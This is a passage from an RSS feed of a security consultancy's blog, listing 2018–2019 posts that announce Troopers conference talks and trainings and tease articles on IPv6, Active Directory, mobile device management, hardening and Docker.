      <description>&lt;p&gt;When you are working in the area of mobile security, you sooner or later receive requests from clients asking you to test specific ‘Mobile Device Management’ (MDM) solutions which they (plan to) use, the corresponding mobile apps, as well as different environment setups and device policy sets.&lt;br&gt;&#xA;The expectations are often high, not only for the MDM solutions ability to massively reduce the administrative workload of keeping track, updating and managing the often hundreds or thousands of devices within a company but also regarding the improvements towards the level of security that an MDM solution is regularly advertised to provide.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 19 – Hack your badge</title>
      <link>https://insinuator.net/2019/04/troopers-19-hack-your-badge/</link>
      <pubDate>Mon, 15 Apr 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/04/troopers-19-hack-your-badge/</guid>
      <description>&lt;p&gt;Sadly, TROOPERS 19 is already over. I had great fun meeting all of you, helping you with your badge problems and seeing others hacking on their badges for example to get custom images on there.&lt;/p&gt;&#xA;&lt;p&gt;With this year’s badge we wanted to give you something you can reuse after the conference, learn new things new build something on your own.&lt;/p&gt;&#xA;&lt;p&gt;As promised in our &lt;a href=&#34;https://www.youtube.com/watch?v=5ZJDIMuPRtY&#34;&gt;talk&lt;/a&gt; Jeff and I would like to give you a short introduction into the badge internals. Along with this post we will release the source code for the badge firmware, the provisioning server and the schematics for the PCB.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Upcoming ISH Conference</title>
      <link>https://insinuator.net/2019/04/upcoming-ish-conference/</link>
      <pubDate>Wed, 03 Apr 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/04/upcoming-ish-conference/</guid>
      <description>&lt;p&gt;We’re happy to announce that some fine folks of ERNW will be present at the upcoming &lt;a href=&#34;https://www.ish-muc.com/conference&#34;&gt;ISH Conference&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The next generation IT security training facility for all industries and any institution that manages complex infrastructure invites you to join the first ISH Conference about threats, prevention and response in Information Security on May 6th– 9th, 2019.&lt;br&gt;&#xA;The event consists of two days of conference and two days of training with insights and shared knowledge by world leading experts at the Information Security Hub (ISH) Munich Airport.&lt;br&gt;&#xA;Learn and discuss the newest threats and solutions with world-renowned experts like Eugene Kaspersky, Adam Meyer, Adrian Nish and others.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The “mmm…” in Community</title>
      <link>https://insinuator.net/2019/03/the-mmm-in-community/</link>
      <pubDate>Thu, 28 Mar 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/03/the-mmm-in-community/</guid>
      <description>&lt;p&gt;When I got home last weekend after an awesome week at &lt;a href=&#34;https://twitter.com/WEareTROOPERS&#34;&gt;WEareTROOPERS&lt;/a&gt;, my 5yr old asked me what actually happened in Heidelberg…&lt;br&gt;&#xA;I told him we were meeting with some people from all over the world to talk about computer security, and he asked me if it was “to stop the bad guys, like super-heroes?”. So I told him “yes, kind of…”, and he decided he would take his new Troopers T-Shirt to school on Monday to show his classmates. Kids are truly amazing… [&amp;lt;3 &amp;lt;3 &amp;lt;3]&lt;/p&gt;</description>
    </item>
    <item>
      <title>Binaries, shellcoding, bug hunting, ROP gadgets and more at Blackhoodie@TR19</title>
      <link>https://insinuator.net/2019/03/binaries-shellcoding-bug-hunting-rop-gadgets-and-more-at-blackhoodie@tr19/</link>
      <pubDate>Fri, 01 Mar 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/03/binaries-shellcoding-bug-hunting-rop-gadgets-and-more-at-blackhoodie@tr19/</guid>
      <description>&lt;p&gt;We have the most amazing trainers this year lined up for Blackhoodie at Troopers 2019. We have &lt;a href=&#34;https://twitter.com/barbieauglend&#34;&gt;Thais&lt;/a&gt;, &lt;a href=&#34;https://twitter.com/SilviaValiSV&#34;&gt;Silvia&lt;/a&gt;, &lt;a href=&#34;https://twitter.com/chiliz16&#34;&gt;Lisa&lt;/a&gt; and &lt;a href=&#34;https://twitter.com/__noutoff__&#34;&gt;Ninon&lt;/a&gt; going to give workshops on various interesting topics! Below are some of the workshop contents:&lt;/p&gt;&#xA;&lt;h3 id=&#34;64-bit-shellcoding-and-introduction-to-buffer-overflow-exploitation-on-linux-by-silvia-väli&#34;&gt;64-bit shellcoding and introduction to buffer overflow exploitation on Linux by &lt;a href=&#34;https://twitter.com/SilviaValiSV&#34;&gt;Silvia Väli&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;64-bit shellcoding and introduction to buffer overflow exploitation on Linux is a 3 hour workshop which is essentially divided into 3 parts:&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;Introduction to 64-bit architecture in order to get familiar with registers, stack, calling conventions described in the Intel 64 (x86-64) architecture manual and the most common assembly instructions and syscalls which we will later use to write our shellcodes.&lt;/li&gt;&#xA;&lt;li&gt;Shellcoding where we try different techniques to write the shellcode and of course you gonna get to greet the shellcoding world with your own Hello World shellcode in addition to reverse shell which we will use later on in part 3&lt;/li&gt;&#xA;&lt;li&gt;Introduction to buffer overflows, so you can put your newly received know-how about stack into practise right away. Shellcode without being used is a wasted shellcode! Part 3 ends with a buffer overflow challenge where your goal is to use your reverse shellcode to get a connection back to your machine.&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;p&gt;&lt;strong&gt;Objectives:&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Address Management / The “External” Flag</title>
      <link>https://insinuator.net/2019/02/ipv6-address-management-/-the-external-flag/</link>
      <pubDate>Fri, 22 Feb 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/02/ipv6-address-management-/-the-external-flag/</guid>
      <description>&lt;p&gt;We’re regularly asked to review IPv6 address plans from different organizations and I’d like to share some reflections from such a process currently happening. I’ve discussed a few aspects of IPv6 address planning before; those readers interested please see &lt;a href=&#34;https://insinuator.net/2019/01/ipv6-talks-publications/&#34;&gt;this post&lt;/a&gt; which contains some references.&lt;/p&gt;&#xA;&lt;p&gt;The organization in question is headquartered in Germany, has ~60K employees and a number of subsidiaries in European countries. They belong to a “traditional industry sector” (so they’re not an “Internet company”, even though they – as the majority of large organizations right now – strive to be one in a few years ;-).&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Security in an IPv4-only Environment</title>
      <link>https://insinuator.net/2019/02/ipv6-security-in-an-ipv4-only-environment/</link>
      <pubDate>Wed, 20 Feb 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/02/ipv6-security-in-an-ipv4-only-environment/</guid>
      <description>&lt;p&gt;Starting a post, in 2019, with a mention of sth being “IPv4-only” somewhat hurts ;-), but here we go. Recently &lt;a href=&#34;https://twitter.com/manelrodero&#34;&gt;Manel Rodero&lt;/a&gt; from Barcelona asked me the &lt;a href=&#34;https://twitter.com/manelrodero/status/1093272272599695360&#34;&gt;following question&lt;/a&gt; on Twitter:&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;tweet_mr.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;In this post I’ll try to discuss some inherent aspects of that question and ofc I’ll try to provide a response to it, too ;-).&lt;/p&gt;&#xA;&lt;p&gt;Let’s first think about the main IPv6-related &lt;em&gt;risks&lt;/em&gt; (= threats put into a context of relevance) in an “environment [that] is only IPv4”. While some of you might scratch your heads “what IPv6 threats could there be in an IPv4 setting?” I’m tempted to scratch my head: “what could be the reasons to run an university network without IPv6 these days, or to use BIND?” (which I have a strong opinion on, see &lt;a href=&#34;https://insinuator.net/2011/11/call-me-snake/&#34;&gt;here&lt;/a&gt; or &lt;a href=&#34;https://twitter.com/Enno_Insinuator/status/852358157292761089&#34;&gt;here&lt;/a&gt;). But I disgress. More seriously the main reason for the question can be broken down to:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Offensivecon 2019</title>
      <link>https://insinuator.net/2019/02/offensivecon-2019/</link>
      <pubDate>Wed, 20 Feb 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/02/offensivecon-2019/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;Last week I had the pleasure to attend &lt;a href=&#34;https://www.offensivecon.org/&#34;&gt;Offensivecon&lt;/a&gt; 2019 in Berlin. The conference was organized very well, and I liked the familial atmosphere which allowed to meet lots of different people. Thanks to the organizers, speakers and everyone else involved for this conference! Andreas posted a &lt;a href=&#34;https://twitter.com/andreasdotorg/status/1096464330915225600&#34;&gt;one tweet tldr&lt;/a&gt; of the first day; fuzzing is still the way to go to find bugs, and mitigations make exploitation harder. Here are some short summaries of the talks I enjoyed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some Notes on the IPv6 Properties of the Wireless Network @ Cisco Live Europe</title>
      <link>https://insinuator.net/2019/02/some-notes-on-the-ipv6-properties-of-the-wireless-network-@-cisco-live-europe/</link>
      <pubDate>Sun, 03 Feb 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/02/some-notes-on-the-ipv6-properties-of-the-wireless-network-@-cisco-live-europe/</guid>
      <description>&lt;p&gt;Some years ago &lt;a href=&#34;https://twitter.com/bcp38&#34;&gt;Christopher&lt;/a&gt; wrote two posts (&lt;a href=&#34;https://insinuator.net/2016/02/observations-from-the-cisco-live-europe-2016-wifi-infrastructure/&#34;&gt;2016&lt;/a&gt;, &lt;a href=&#34;https://insinuator.net/2015/01/observations-from-the-cisco-live-europe-wifi-infrastructure/&#34;&gt;2015&lt;/a&gt;) about the  IPv6-related characteristics of the WiFi network at Cisco Live Europe. To somewhat continue this tradition and for mere technical interest I had a look at some properties of this year’s setting.&lt;/p&gt;&#xA;&lt;p&gt;There were two SSIDs of interest: a dual-stacked one (“CiscoLive2019”) and one with v6-only plus NAT64 (“CL-NAT64”). For some background on the underlying infrastructure components you might look at this &lt;a href=&#34;https://twitter.com/DarchisNicolas/status/1089095382171299840&#34;&gt;thread&lt;/a&gt; by &lt;a href=&#34;https://twitter.com/DarchisNicolas&#34;&gt;Nicolas Darchis&lt;/a&gt; from the NOC or at &lt;a href=&#34;https://twitter.com/networkautobahn/status/1089827410541977600&#34;&gt;this tweet&lt;/a&gt; from &lt;a href=&#34;https://twitter.com/networkautobahn&#34;&gt;Dominik Pickhardt&lt;/a&gt;. Some stats on IPv6 usage at CLEUR can be found &lt;a href=&#34;https://twitter.com/SNMPguy/status/1091018632593895425&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TelcoSecDay 2019 – First talks preview</title>
      <link>https://insinuator.net/2019/01/telcosecday-2019-first-talks-preview/</link>
      <pubDate>Tue, 29 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/telcosecday-2019-first-talks-preview/</guid>
      <description>&lt;p&gt;This year we had some excellent submissions for TelcoSecDay.  Here are the first four confirmed speakers who are going to talk about the below mentioned topics:&lt;/p&gt;&#xA;&lt;h4 id=&#34;1-telecom-protocols-revisited--not-just-a-signalling-problem--by-fredrik-söderlund&#34;&gt;&lt;strong&gt;1. Telecom protocols revisited – Not just a signalling problem – by Fredrik Söderlund&lt;/strong&gt;&lt;/h4&gt;&#xA;&lt;p&gt;A look at the design of the currently deployed signalling protocols for core networks, both SS7 and Diameter (legacy and LTE). Peculiar quirks and how the design has lead to the industry sometimes failing to adhere to its own standards.&lt;/p&gt;</description>
    </item>
    <item>
      <title>2019 – Year Of The Blue Dog…</title>
      <link>https://insinuator.net/2019/01/2019-year-of-the-blue-dog/</link>
      <pubDate>Mon, 28 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/2019-year-of-the-blue-dog/</guid>
      <description>&lt;p&gt;Back from Holidays, you started the year well motivated to &lt;strong&gt;make the world a safer place&lt;/strong&gt;.&lt;br&gt;&#xA;However, sitting at your desk today  you realize nothing really changed since last year, and you are surfing the web, feeling a bit blue, trying to avoid that pile of emails waiting for you and wondering how you could &lt;strong&gt;gain some visibility on your domain in order to better defend it&lt;/strong&gt;.&lt;br&gt;&#xA;No worries, emails can wait a bit longer. All you need is some fresh air and something cool to keep your defensive mind motivated for the year,  and I might have just what you need; so put on your shoes and let me take you on a 15 minute Cypher walk with a cool blue dog…&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR19 Active Directory Security Track</title>
      <link>https://insinuator.net/2019/01/%23tr19-active-directory-security-track/</link>
      <pubDate>Wed, 23 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/%23tr19-active-directory-security-track/</guid>
      <description>&lt;p&gt;As some of you might recall we’ve introduced a dedicated “Active Directory Security Track” at last year’s &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers&lt;/a&gt;. For Troopers19 we’ve expanded it to two days (as the SAP Security Track was discontinued), and in the following I’ll provide a list of talks in the track.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Vincent Le Toux: You “try” to detect mimikatz&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Abstract: This is 2019 and you still “try” to detect mimikatz. “Try”, because after many years, this post exploitation tool continues to be successful.&lt;br&gt;&#xA;As a contributor to mimikatz and also a blue team guy, I’m asking myself why antivirus vendors are unable to catch it after many years.&lt;br&gt;&#xA;How can a tool be blocked if nobody does not know what this tool is doing? Because surprisingly, it is known only for credential collection but mimikatz is a lot more.&lt;br&gt;&#xA;To mitigate the lack of antivirus vendor, should we buy new fancy EDR tool or try a technical approach? Apply a Framework? Rely on Compliance? Use a SIEM to collect logs and apply correlation? In sumarry, can we detect mimikatz?&lt;br&gt;&#xA;In this presentation we will try to understand why mimikatz has such power and especially some weakness related to credential gathering and active directory will be exposed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS19 Training Teaser: Hacking mobile applications</title>
      <link>https://insinuator.net/2019/01/troopers19-training-teaser-hacking-mobile-applications/</link>
      <pubDate>Wed, 16 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/troopers19-training-teaser-hacking-mobile-applications/</guid>
      <description>&lt;p&gt;“If it’s a thing, then there’s an app for it!”…We trust mobile apps to process our bank transactions, handle our private data and set us up on romantic dates. However, few of us care to wonder,”How (in)secure can these apps be?” Well… at Troopers 19, you can learn how to answer this question yourself!&lt;/p&gt;&#xA;&lt;p&gt;In our 2 day long “Hacking mobile applications” workshop, we teach how to find security vulnerabilities in mobile apps, exploit them and defend against them. We start from scratch, therefore no prior experience in hacking or developing mobile apps is required. Whether you want to learn how to pentest mobile apps, you are an app developer that fancies to secure his/her apps, or just curios, our workshop is a jumpstart to your goal.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS19 Training Teaser: Insight Into Windows Internals</title>
      <link>https://insinuator.net/2019/01/troopers19-training-teaser-insight-into-windows-internals/</link>
      <pubDate>Tue, 15 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/troopers19-training-teaser-insight-into-windows-internals/</guid>
      <description>&lt;p&gt;Windows 10 is one of the most commonly deployed operating systems at this time. Knowledge about its components and internal working principles is highly beneficial. Among other things, such a knowledge enables:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;in-depth studies of undocumented, or poorly documented, system functionalities;&lt;/li&gt;&#xA;&lt;li&gt;development of performant and compatible software to monitor or extend the activities of the operating system itself; and&lt;/li&gt;&#xA;&lt;li&gt;analysis of security-related issues, such as persistent malware.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;The “Insight into Windows Internals” training offered at TROOPERS’19 delivers knowledge on the core components and inner working principles of Windows 10. For example, the training provides knowledge on how Windows 10 uses virtualization to isolate security-critical functionalities from attackers that have managed to compromise the system. The training includes a variety of practical exercises allowing attendees to observe first-hand the operation of Windows 10.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS19 Training Teaser: Hacking 101</title>
      <link>https://insinuator.net/2019/01/troopers19-training-teaser-hacking-101/</link>
      <pubDate>Mon, 14 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/troopers19-training-teaser-hacking-101/</guid>
      <description>&lt;p&gt;Hi there,&lt;br&gt;&#xA;like in recent years the popular &lt;a href=&#34;https://www.troopers.de/troopers19/trainings/beheul/&#34;&gt;Hacking 101 workshop&lt;/a&gt; will take place on TROOPERS19, too! The workshop will give you an insight into the &lt;strong&gt;hacking techniques&lt;/strong&gt; required for &lt;strong&gt;penetration testing&lt;/strong&gt;. These techniques will cover various topics:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Information gathering&lt;/li&gt;&#xA;&lt;li&gt;Network scanning&lt;/li&gt;&#xA;&lt;li&gt;Web application hacking&lt;/li&gt;&#xA;&lt;li&gt;Low-level exploitation&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;…and more!&lt;/p&gt;&#xA;&lt;p&gt;During this workshop &lt;strong&gt;you will learn&lt;/strong&gt;, step by step, a &lt;strong&gt;testing methodology&lt;/strong&gt; that applies to the majority of scenarios. So imagine you have to &lt;strong&gt;assess&lt;/strong&gt; the &lt;strong&gt;security of a system&lt;/strong&gt; running on the Internet. How would you start? First, you need a good understanding of the target, including running services or related systems. Just &lt;strong&gt;scanning&lt;/strong&gt; the target’s IP address will most likely not reveal all relevant information you can get. In the information gathering step, you will learn where you could find more relevant information than just a list of open ports. A brief understanding of the target and it’s related systems/services/applications will make scanning and &lt;strong&gt;identifying vulnerabilities&lt;/strong&gt; a lot easier and more effective. Then, the last step will be the &lt;strong&gt;exploitation&lt;/strong&gt; of the identified vulnerabilities, with the ultimate aim to &lt;strong&gt;get access to the target system&lt;/strong&gt; and pivot to other, probably internal, systems and resources.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS19 Training Teaser: Windows &amp;amp; Linux Binary Exploitation</title>
      <link>https://insinuator.net/2019/01/troopers19-training-teaser-windows-amp-linux-binary-exploitation/</link>
      <pubDate>Mon, 14 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/troopers19-training-teaser-windows-amp-linux-binary-exploitation/</guid>
      <description>&lt;p&gt;Once again Troopers will have its Windows &amp;amp; Linux Binary Exploitation workshop. Its main focus are the ever-present stack-based buffer overflows still found in software today (e.g. CVE-2018-5002, CVE-2018-1459, and CVE-2018-12897) and their differences with regard to exploitation on Windows and Linux systems. If you ever wanted to know the details of the exploit development process for these systems then this workshop is for you.&lt;/p&gt;&#xA;&lt;p&gt;After initial exercises involving the exploitation of classic stack-based buffer overflows, modern defense mechanism such as Stack Cookies, DEP, and ASLR are presented and analyzed for weaknesses. The participants will learn how these defense mechanisms can be bypassed and will develop exploits targeting real world applications such as the Foxit Reader Plugin for Firefox, Wireshark, and nginx.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS19 Training Teaser: Hardening Microsoft Environments</title>
      <link>https://insinuator.net/2019/01/troopers19-training-teaser-hardening-microsoft-environments/</link>
      <pubDate>Fri, 11 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/troopers19-training-teaser-hardening-microsoft-environments/</guid>
      <description>&lt;p&gt;“Credential Theft” or “Credential Reuse” attack techniques are the biggest known threats to Active Directory environments. This can be attributed to significant advances in and broad distribution of attack and reconnaissance tools such as mimikatz or Bloodhound. This means that after the first system in an environment is compromised it often takes less than 48 hours for a complete compromise of an Active Directory but unfortunately typically 8 to 9 months until the attack is discovered.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Talks &amp; Publications</title>
      <link>https://insinuator.net/2019/01/ipv6-talks-publications/</link>
      <pubDate>Thu, 10 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/ipv6-talks-publications/</guid>
      <description>&lt;p&gt;At first a very happy new year to everybody!&lt;/p&gt;&#xA;&lt;p&gt;While thinking about the agenda of the upcoming &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers&lt;/a&gt; NGI IPv6 Track I realized that quite a lot of IPv6-related topics have been covered in the last years by various IPv6 practitioners (like my colleague &lt;a href=&#34;https://twitter.com/bcp38_&#34;&gt;Christopher Werny&lt;/a&gt;) or researchers (like my friend &lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonios Atlasis&lt;/a&gt;). In a kind of shameless self plug I then decided to put together of list of IPv6 talks I myself gave at several occasions and of publications I (co-) authored. Please find this list below (sorted by years); you can click on the titles to access the respective documents/sources.&lt;br&gt;&#xA;I hope some of this can be of help for one or the other among you in the course of your own IPv6 efforts.&lt;br&gt;&#xA;Cheers,&lt;/p&gt;</description>
    </item>
    <item>
      <title>macOS Mojave Hardening Guide</title>
      <link>https://insinuator.net/2019/01/macos-mojave-hardening-guide/</link>
      <pubDate>Thu, 10 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/macos-mojave-hardening-guide/</guid>
      <description>&lt;p&gt;Due to the new release of macOS Mojave in September we updated the El Capitan hardening guide.&lt;/p&gt;&#xA;&lt;p&gt;The hardening guide received a little revamp on some chapters which are now obsolete or had to be changed due to the new features of macOS Mojave. Further, the hardening guide got extended for the new privacy features in macOS Mojave.&lt;/p&gt;&#xA;&lt;p&gt;You can check it out &lt;a href=&#34;https://github.com/ernw/hardening/blob/master/operating_system/osx/10.14/ERNW_Hardening_OS_X_Mojave.md&#34;&gt;here&lt;/a&gt;. We hope some of you might find it helpful.&lt;br&gt;&#xA;Cheers,&lt;br&gt;&#xA;Birk&lt;/p&gt;</description>
    </item>
    <item>
      <title>Secure CI/CD Pipelines @Troopers ’19</title>
      <link>https://insinuator.net/2019/01/secure-ci/cd-pipelines-@troopers-19/</link>
      <pubDate>Thu, 10 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/secure-ci/cd-pipelines-@troopers-19/</guid>
      <description>&lt;p&gt;In the last couple of months we participated in an increasing count of customer projects following current trends of agile software development approaches and corresponding toolstacks. Especially the terms &lt;em&gt;Continuous Integration&lt;/em&gt; and &lt;em&gt;Continuous Delivery&lt;/em&gt; kept (and still keep) popping up on every corner. The frameworks and processes behind those two hypes aid developing software at higher quality in shorter release cycles. This is especially relevant since end consumers nowadays expect fast releases including the newest features. If companies neglect this demand, competitors might take advantage of their better time-to-market which might result in increased market share and -dominance. A lot of changes are happening in the space of CI/CD. Existing tools become more mature, gaining increased attention, and new ones are appearing every month including better ways of integrating them into existing or new processes. Companies benefit from more choices, increased flexibility, and faster integration into existing company policies.&lt;/p&gt;</description>
    </item>
    <item>
      <title>35C3: Refreshing Memories</title>
      <link>https://insinuator.net/2019/01/35c3-refreshing-memories/</link>
      <pubDate>Mon, 07 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/35c3-refreshing-memories/</guid>
      <description>&lt;p&gt;Hello fellow Troopers and Happy new Year!&lt;/p&gt;&#xA;&lt;p&gt;35C3 is over, and the recordings are available so in case you did not have the chance or the time to watch the live streams during the holidays or overwhelmed with the number of talks, see in the following a list of recommended talks to fill your evenings or weekends. Apart from the broad coverage of topics in different areas (Ethics, Society &amp;amp; Politics, Hardware &amp;amp; Making, Resilience, Art and Culture, Security, Science, Resilience), foundation talks were aiming for the very basics following this year’s motto “Refreshing Memories.”&lt;/p&gt;</description>
    </item>
    <item>
      <title>Blackhoodie at TROOPERS19</title>
      <link>https://insinuator.net/2019/01/blackhoodie-at-troopers19/</link>
      <pubDate>Fri, 04 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/blackhoodie-at-troopers19/</guid>
      <description>&lt;p&gt;We are going to have a &lt;a href=&#34;https://insinuator.net/tag/blackhoodie/&#34;&gt;Blackhoodie event&lt;/a&gt; at &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers 2019&lt;/a&gt; on March 18th and 19th in Heidelberg. With a very exciting event last year, we have decided to roll it once again during Troopers.&lt;/p&gt;&#xA;&lt;p&gt;As always, one of the main motivation for &lt;a href=&#34;https://www.blackhoodie.re/about/&#34;&gt;Blackhoodie&lt;/a&gt; is bringing more women into reversing and other core security topics. So we would like to see more women apply to the training slots. However, if you are not a women and still feel really excited about Blackhoodie, you are welcome to apply. We do have a very limited number of seats at this training site. So we apologize in advance if we can’t accommodate everyone, even though we wish we could! Please apply before &lt;strong&gt;“February 10th”&lt;/strong&gt; and we will contact you regarding next steps.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Catching fire with Docker, DevOps &amp;amp; Security in Enterprise Environments</title>
      <link>https://insinuator.net/2019/01/catching-fire-with-docker-devops-amp-security-in-enterprise-environments/</link>
      <pubDate>Fri, 04 Jan 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/01/catching-fire-with-docker-devops-amp-security-in-enterprise-environments/</guid>
      <description>&lt;p&gt;Docker has become the go-to technology in enterprise- and DevOps contexts. Yet, before mastering a skill, there is the thumb rule: one must learn the basics to have solid fundament before building a house on top.&lt;/p&gt;&#xA;&lt;p&gt;Simon and I start from the very beginning. We introduce you to the fundamental concepts of containers starting at process isolation and extending our tour to the whole ecosystem of Docker and further associated technologies. We will cover Docker, microservices, containers, DevOps, continuous integration/deployment/delivery – all those fancy buzzwords that can be read in the context of modern software development methodologies.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Motivational Aspects and Privacy Concerns on Wearables in the German Running Community</title>
      <link>https://insinuator.net/2018/12/motivational-aspects-and-privacy-concerns-on-wearables-in-the-german-running-community/</link>
      <pubDate>Fri, 14 Dec 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/12/motivational-aspects-and-privacy-concerns-on-wearables-in-the-german-running-community/</guid>
      <description>&lt;p&gt;Today I am proud to announce that another paper of my former colleagues from Heilbronn University and me was published in one of the journals with the highest impact factor for Medical Informatics research called &lt;em&gt;JMIR mHealth and uHealth&lt;/em&gt;. There is a reason why we published in this journal besides its informatics focus. The journal is an open access journal. That means that readers are not charged on a pay-per-view basis or other business models to access the full text of the paper. In return, the authors need to pay publication fees. In my opinion restricting access to academic research is not a way to go. I think this isn’t a thing we see in the security community often anyway. But this is and was the standard in academia for years.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW Whitepaper 67: Active Directory Trust Considerations</title>
      <link>https://insinuator.net/2018/12/ernw-whitepaper-67-active-directory-trust-considerations/</link>
      <pubDate>Tue, 11 Dec 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/12/ernw-whitepaper-67-active-directory-trust-considerations/</guid>
      <description>&lt;p&gt;Last week &lt;a href=&#34;https://twitter.com/HarmJ0y&#34;&gt;Will “harmj0y” Schroeder&lt;/a&gt; published an excellent technical article titled &lt;a href=&#34;https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/&#34;&gt;“Not A Security Boundary: Breaking Forest Trusts”&lt;/a&gt; in which he lays out how a highly critical security compromise can be achieved across a forest boundary, resulting from a combination of default AD (security) settings and a novel attack method. His post is a follow-up to the DerbyCon talk “The Unintended Risks of Trusting Active Directory” which he had given together with &lt;a href=&#34;https://twitter.com/tifkin_&#34;&gt;Lee Christensen&lt;/a&gt; and &lt;a href=&#34;https://twitter.com/enigma0x3&#34;&gt;Matt Nelson&lt;/a&gt; at DerbyCon (video &lt;a href=&#34;http://www.irongeek.com/i.php?page=videos/derbycon8/track-2-03-the-unintended-risks-of-trusting-active-directory-lee-christensen-will-schroeder-matt-nelson&#34;&gt;here&lt;/a&gt;). They will also discuss this at the upcoming &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers&lt;/a&gt; Active Directory Security Track (details on some more talks, including &lt;a href=&#34;https://twitter.com/PyroTek3&#34;&gt;Sean Metcalf’s&lt;/a&gt; one, can be found in &lt;a href=&#34;https://insinuator.net/2018/11/first-talks-of-troopers19-accepted/&#34;&gt;this post&lt;/a&gt; or &lt;a href=&#34;https://insinuator.net/2018/12/and-five-talks-more-were-accepted-at-troopers19/&#34;&gt;this one&lt;/a&gt;).&lt;/p&gt;</description>
    </item>
    <item>
      <title>And Five Talks More Were Accepted at TROOPERS19!</title>
      <link>https://insinuator.net/2018/12/and-five-talks-more-were-accepted-at-troopers19/</link>
      <pubDate>Mon, 10 Dec 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/12/and-five-talks-more-were-accepted-at-troopers19/</guid>
      <description>&lt;p&gt;And five talks more were chosen for TROOPERS19! It sounds like it is going to be the best year ever again…&lt;/p&gt;&#xA;&lt;p&gt;Follow us on Twitter (&lt;a href=&#34;https://twitter.com/WEareTROOPERS&#34;&gt;@WEareTROOPERS&lt;/a&gt;) for more information and do not hesitate to use our hashtag #TR19 when you have questions or remarks about TROOPERS19!&lt;/p&gt;&#xA;&lt;p&gt;Your TROOPERS Team&lt;/p&gt;&#xA;&lt;p&gt;——————————–&lt;/p&gt;&#xA;&lt;h1 id=&#34;not-a-security-boundary-breaking-forest-trusts-by-will-schroeder-lee-christensen&#34;&gt;Not A Security Boundary: Breaking Forest Trusts by Will Schroeder, Lee Christensen&lt;/h1&gt;&#xA;&lt;p&gt;Presenting at the Active Directory Security Track&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Abstract:&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>DirectoryRanger 1.1.0 Introduces Informational Audit Checks</title>
      <link>https://insinuator.net/2018/12/directoryranger-1.1.0-introduces-informational-audit-checks/</link>
      <pubDate>Mon, 03 Dec 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/12/directoryranger-1.1.0-introduces-informational-audit-checks/</guid>
